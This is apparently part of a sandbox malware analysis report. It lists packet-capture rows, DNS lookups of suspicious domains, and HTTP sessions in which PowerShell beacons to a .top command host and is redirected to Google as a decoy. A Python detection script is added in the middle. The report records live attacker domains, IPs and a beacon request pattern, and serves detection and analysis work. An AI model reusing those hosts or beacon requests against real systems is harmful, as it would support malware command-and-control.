Dec 17, 2024 16:32:07.225122929 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.225193977 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.225255966 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.225294113 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.225311041 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.225339890 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.225375891 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.225425959 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.226494074 CET  49711        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.226526976 CET  443          49711      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.246661901 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.246710062 CET  443          49715      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:07.246809006 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.271218061 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:07.271241903 CET  443          49715      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.371697903 CET  443          49714      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.371814013 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.372503996 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.372519016 CET  443          49714      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.372692108 CET  49714        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.372704029 CET  443          49714      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.638117075 CET  443          49715      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.638243914 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.638631105 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.638637066 CET  443          49715      45.11.180.77  192.168.2.6
Dec 17, 2024 16:32:08.638964891 CET  49715        443        192.168.2.6   45.11.180.77
Dec 17, 2024 16:32:08.638968945 CET  443          49715      45.11.180.77  192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883600950 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883666992 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883677006 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.883737087 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:08.883770943 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:08.883819103 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.001640081 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.001751900 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.090008974 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.090142965 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.108351946 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.108510971 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.136127949 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.136245012 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.164964914 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165038109 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165199041 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.165230989 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.165299892 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.189438105 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.189543962 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.267764091 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.267906904 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.273437023 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.273592949 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.286801100 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.286901951 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.300554991 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.300647020 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.318411112 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.318500996 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.329150915 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.329246044 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.338567972 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.338666916 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.347908974 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.347995996 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.353601933 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.353719950 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.372348070 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.372462988 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.390264034 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.390371084 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.397156954 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.397273064 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.457964897 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.458122969 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.463186026 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.463294029 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.470396996 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.470499039 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.477770090 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.477859974 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.487080097 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.487174034 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.494263887 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.494338036 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.501449108 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.501528025 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.510879993 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.510962009 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512698889 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512772083 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512805939 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512840033 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.512868881 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512898922 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512938023 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.512969971 CET4434971445.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.513008118 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.513030052 CET49714443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.548793077 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.548897982 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:09.560720921 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:09.560811043 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.047904015 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.047924995 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.047997952 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.063512087 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.063606977 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.076304913 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.076394081 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.087532043 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.087601900 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.103497028 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.103574991 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.115082026 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.115202904 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.128269911 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.128365993 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.141191006 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.141261101 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.297354937 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.297471046 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.496213913 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.496304035 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.506001949 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.506103039 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.515351057 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.515526056 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.697635889 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.698225975 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.704791069 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.704921007 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.713671923 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.713771105 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.725644112 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.725800991 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.735687017 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.735797882 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.744954109 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.745105028 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.930499077 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.930603981 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933301926 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933361053 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933370113 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933383942 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.933470964 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933470964 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933947086 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933947086 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:10.933974981 CET4434971545.11.180.77192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:10.934024096 CET49715443192.168.2.645.11.180.77
                                                                                                                              Dec 17, 2024 16:32:13.978851080 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:13.979507923 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.098853111 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.099272013 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.099361897 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.101399899 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.101443052 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.102019072 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:14.221040010 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:14.221534014 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.718879938 CET8049732193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.720865011 CET8049733193.149.129.61192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.764123917 CET4973380192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:15.860488892 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.860743999 CET4974080192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.873502970 CET4973280192.168.2.6193.149.129.61
                                                                                                                              Dec 17, 2024 16:32:15.980298042 CET8049741172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.980374098 CET8049740172.217.19.228192.168.2.6
                                                                                                                              Dec 17, 2024 16:32:15.980407953 CET4974180192.168.2.6172.217.19.228
                                                                                                                              Dec 17, 2024 16:32:15.980462074 CET4974080192.168.2.6172.217.19.228
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Dec 17, 2024 16:32:00.117710114 CET  61016        53         192.168.2.6  1.1.1.1
Dec 17, 2024 16:32:00.556895018 CET  53           61016      1.1.1.1      192.168.2.6
Dec 17, 2024 16:32:13.690642118 CET  61409        53         192.168.2.6  1.1.1.1
Dec 17, 2024 16:32:13.934084892 CET  53           61409      1.1.1.1      192.168.2.6
Dec 17, 2024 16:32:15.720129013 CET  50435        53         192.168.2.6  1.1.1.1
Dec 17, 2024 16:32:15.857433081 CET  53           50435      1.1.1.1      192.168.2.6
DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 17, 2024 16:32:00.117710114 CET | 192.168.2.6 | 1.1.1.1 | 0x4479 | Standard query (0) | pko-download.kagyouth.co.ke | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:32:13.690642118 CET | 192.168.2.6 | 1.1.1.1 | 0xcada | Standard query (0) | gsosnub8zg3.top | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:32:15.720129013 CET | 192.168.2.6 | 1.1.1.1 | 0x91f2 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001) | false

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 17, 2024 16:32:00.556895018 CET | 1.1.1.1 | 192.168.2.6 | 0x4479 | No error (0) | pko-download.kagyouth.co.ke | (none) | 45.11.180.77 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:32:13.934084892 CET | 1.1.1.1 | 192.168.2.6 | 0xcada | No error (0) | gsosnub8zg3.top | (none) | 193.149.129.61 | A (IP address) | IN (0x0001) | false
Dec 17, 2024 16:32:15.857433081 CET | 1.1.1.1 | 192.168.2.6 | 0x91f2 | No error (0) | www.google.com | (none) | 172.217.19.228 | A (IP address) | IN (0x0001) | false

HTTP Request Dependency Graph

• pko-download.kagyouth.co.ke
• gsosnub8zg3.top
• www.google.com
HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49732 | 193.149.129.61 | 80 | 2144 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:32:14.101443052 CET | 175 | OUT | GET /1.php?s=mints21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gsosnub8zg3.top
Connection: Keep-Alive
Dec 17, 2024 16:32:15.718879938 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 15:32:15 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49733 | 193.149.129.61 | 80 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:32:14.102019072 CET | 175 | OUT | GET /1.php?s=mints21 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: gsosnub8zg3.top
Connection: Keep-Alive
Dec 17, 2024 16:32:15.720865011 CET | 166 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0 (Ubuntu)
Date: Tue, 17 Dec 2024 15:32:15 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.google.com


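The two sessions above are the part of the capture a responder would script a detection around: powershell.exe (not a browser) sends a GET with the default WindowsPowerShell User-Agent and a one-token query string to a freshly resolved .top domain, and the server answers an empty 302 to www.google.com, which the same PID then follows. The following is an added example, not code from the report, the sandbox or the malware. It parses a constructed, body-less copy of the four HTTP sessions in this report and applies those checks; the decoy-target allowlist, the query-string pattern and the finding format are assumptions made for the example.

```python
"""Flag PowerShell-originated HTTP beacons that hide behind a decoy redirect.

Added example (not part of the Joe Sandbox report). Input is a simplified copy
of the report's HTTP session records: session id, PID, raw request and raw
response headers. Checks applied per session:
  1. default WindowsPowerShell User-Agent (Invoke-WebRequest / WebClient),
     which no browser emits;
  2. a short tag-style query string (here s=mints21), typical of a stager
     identifying its build to the server;
  3. an empty 3xx redirect to a well-known benign host (assumed allowlist),
     and a later request from the same PID that follows it.
"""
import re
from dataclasses import dataclass, field

PS_UA = ("Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) "
         "WindowsPowerShell/5.1.19041.1682")


def _request(target: str, host: str) -> str:
    """Build a request block in the shape the report shows (constructed)."""
    return (f"GET {target} HTTP/1.1\r\nUser-Agent: {PS_UA}\r\n"
            f"Host: {host}\r\nConnection: Keep-Alive\r\n\r\n")


BEACON_RESPONSE = ("HTTP/1.1 302 Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\n"
                   "Content-Length: 0\r\nConnection: keep-alive\r\n"
                   "Location: http://www.google.com\r\n\r\n")
GOOGLE_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: gws\r\n"
                   "Content-Type: text/html; charset=UTF-8\r\n"
                   "Transfer-Encoding: chunked\r\n\r\n")

# Constructed from the report's four HTTP sessions (response bodies omitted).
SESSIONS = [
    {"session": 0, "pid": 2144,
     "request": _request("/1.php?s=mints21", "gsosnub8zg3.top"),
     "response": BEACON_RESPONSE},
    {"session": 1, "pid": 7016,
     "request": _request("/1.php?s=mints21", "gsosnub8zg3.top"),
     "response": BEACON_RESPONSE},
    {"session": 2, "pid": 7016,
     "request": _request("/", "www.google.com"), "response": GOOGLE_RESPONSE},
    {"session": 3, "pid": 2144,
     "request": _request("/", "www.google.com"), "response": GOOGLE_RESPONSE},
]

POWERSHELL_UA = re.compile(r"WindowsPowerShell/\d+\.\d+")
# key=value pairs of a few alphanumerics each: a build/campaign tag, not a form.
TAG_QUERY = re.compile(r"^[A-Za-z0-9_]{1,8}=[A-Za-z0-9_-]{1,16}$")
DECOY_TARGETS = {"www.google.com", "www.bing.com", "www.microsoft.com"}  # assumption


@dataclass
class Finding:
    session: int
    pid: int
    host: str
    reasons: list[str] = field(default_factory=list)


def parse_message(raw: str) -> tuple[str, dict[str, str]]:
    """Split an HTTP message into its start line and a lower-cased header map."""
    head = raw.split("\r\n\r\n", 1)[0]
    start, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        if ":" in line:
            key, value = line.split(":", 1)
            headers[key.strip().lower()] = value.strip()
    return start, headers


def analyse(sessions: list[dict]) -> list[Finding]:
    """Return one Finding per suspicious session, in capture order."""
    findings: list[Finding] = []
    redirects: dict[tuple[int, str], int] = {}  # (pid, decoy host) -> session
    for s in sessions:
        req_line, req_h = parse_message(s["request"])
        resp_line, resp_h = parse_message(s["response"])
        host = req_h.get("host", "")
        f = Finding(s["session"], s["pid"], host)

        ua = req_h.get("user-agent", "")
        if POWERSHELL_UA.search(ua):
            f.reasons.append("non-browser User-Agent: " + ua.split()[-1])

        target = req_line.split(" ", 2)[1]
        query = target.partition("?")[2]
        if query and all(TAG_QUERY.match(p) for p in query.split("&")):
            f.reasons.append(f"short tag-style query string: {query}")

        status = resp_line.split(" ", 2)[1]
        loc_host = re.sub(r"^https?://", "", resp_h.get("location", "")).split("/")[0]
        if (status in {"301", "302", "307"} and resp_h.get("content-length") == "0"
                and loc_host in DECOY_TARGETS):
            f.reasons.append(f"empty {status} decoy redirect to {loc_host}")
            redirects[(s["pid"], loc_host)] = s["session"]

        origin = redirects.get((s["pid"], host))
        if host in DECOY_TARGETS and origin is not None:
            f.reasons.append(f"follows decoy redirect from session {origin}")

        if f.reasons:
            findings.append(f)
    return findings


if __name__ == "__main__":
    for finding in analyse(SESSIONS):
        print(f"session {finding.session} pid {finding.pid} {finding.host}:")
        for reason in finding.reasons:
            print("   -", reason)
```

The redirect correlation is keyed on PID because the report shows two independent PowerShell processes (2144 and 7016) each performing its own beacon-then-Google pair; correlating on destination alone would merge them. On a real proxy log the same three checks apply, with the PID replaced by source IP plus client port or a session cookie.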
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49741 | 172.217.19.228 | 80 | 7016 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 16:32:15.980617046 CET | 159 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Host: www.google.com
Connection: Keep-Alive
Dec 17, 2024 16:32:18.069437981 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 15:32:17 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-yzXRdpy2Rs1IVD7ZvaxFVw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-UtPgyEPT9fdVxuwknB-RcPKkfgyhFbCKy0OE2Os75rf3lnqSkpgYA; expires=Sun, 15-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: NID=520=bEVFesC79TSQlR3ja3UcO--pzty1bla6okvd6E6RBfc-3JHkEhAx8lFHMGuDFMVniAS0jy2tYW9AFda8iTwl7Nutom7mj2ndklqsBi6VUwBQNyh2x2r6nsX9SP-QUxAn1k-PgztxL_5-antSsACod0yxCB3HvpWL9IwnBGrZ7KhcctiXzuzNGWOuMwFvc-naafbSzJmegw; expires=Wed, 18-Jun-2025 15:32:17 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
Data Raw: 34 37 61 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 69 74 65 6d 73 63 6f 70 65 3d 22 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 53 65 61 72 63 68 20 74 68 65 20 77 6f 72 6c 64 27 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 20 77 65 62 70 61 67 65 73 2c 20 69 6d 61 67 65 73
Data Ascii: 47a0<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en"><head><meta content="Search the world's information, including webpages, images
Dec 17, 2024 16:32:18.069524050 CET | 224 | IN | Data Raw: 2c 20 76 69 64 65 6f 73 20 61 6e 64 20 6d 6f 72 65 2e 20 47 6f 6f 67 6c 65 20 68 61 73 20 6d 61 6e 79 20 73 70 65 63 69 61 6c 20 66 65 61 74 75 72 65 73 20 74 6f 20 68 65 6c 70 20 79 6f 75 20 66 69 6e 64 20 65 78 61 63 74 6c 79 20 77 68 61 74 20
Data Ascii: , videos and more. Google has many special features to help you find exactly what you're looking for." name="description"><meta content="noodp, " name="robots"><meta content="text/html; charset=UTF-8" http-equiv="Content-Typ
Dec 17, 2024 16:32:18.069536924 CET | 1236 | IN | Data Raw: 65 22 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 2f 6c 6f 67 6f 73 2f 64 6f 6f 64 6c 65 73 2f 32 30 32 34 2f 73 65 61 73 6f 6e 61 6c 2d 68 6f 6c 69 64 61 79 73 2d 32 30 32 34 2d 36 37 35 33 36 35 31 38 33 37 31 31 30 33 33 33 2d 6c 61 77 2e
Data Ascii: e"><meta content="/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-law.gif" itemprop="image"><meta content="Seasonal Holidays 2024" property="twitter:title"><meta content="Happy Holidays! #GoogleDoodle" property="twitter:description
Dec 17, 2024 16:32:18.069722891 CET | 1236 | IN | Data Raw: 37 2c 38 39 2c 31 2c 31 2c 31 2c 31 2c 31 35 2c 36 33 2c 34 2c 32 2c 31 36 2c 32 36 2c 35 2c 32 33 39 33 34 32 38 37 2c 34 30 34 33 37 31 30 2c 32 35 32 32 34 30 34 35 2c 34 36 33 36 2c 31 31 37 33 31 2c 34 37 30 35 2c 32 39 39 34 37 2c 35 34 30
Data Ascii: 7,89,1,1,1,1,15,63,4,2,16,26,5,23934287,4043710,25224045,4636,11731,4705,29947,54098,22623,884,14280,8181,5934,22913,20583,9236,9775,2664,3430,3319,23879,9139,4599,328,4456,1769,6754,16653,6,10210,688,7851,24,21978,1135,212,13702,8211,3286,279
Dec 17, 2024 16:32:18.069737911 CET | 304 | IN | Data Raw: 39 2c 32 30 33 38 30 38 38 27 2c 6b 42 4c 3a 27 62 42 4a 58 27 2c 6b 4f 50 49 3a 38 39 39 37 38 34 34 39 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3b 28 28 61 3d 77 69 6e 64 6f 77 2e 67 6f 6f 67 6c 65 29 3d 3d 6e 75 6c 6c 3f 30 3a
Data Ascii: 9,2038088',kBL:'bBJX',kOPI:89978449};(function(){var a;((a=window.google)==null?0:a.stvsc)?google.kEI=_g.kEI:window.google=_g;}).call(this);})();(function(){google.sn='webhp';google.kHL='en';})();(function(){var g=this||self;function k(){retu
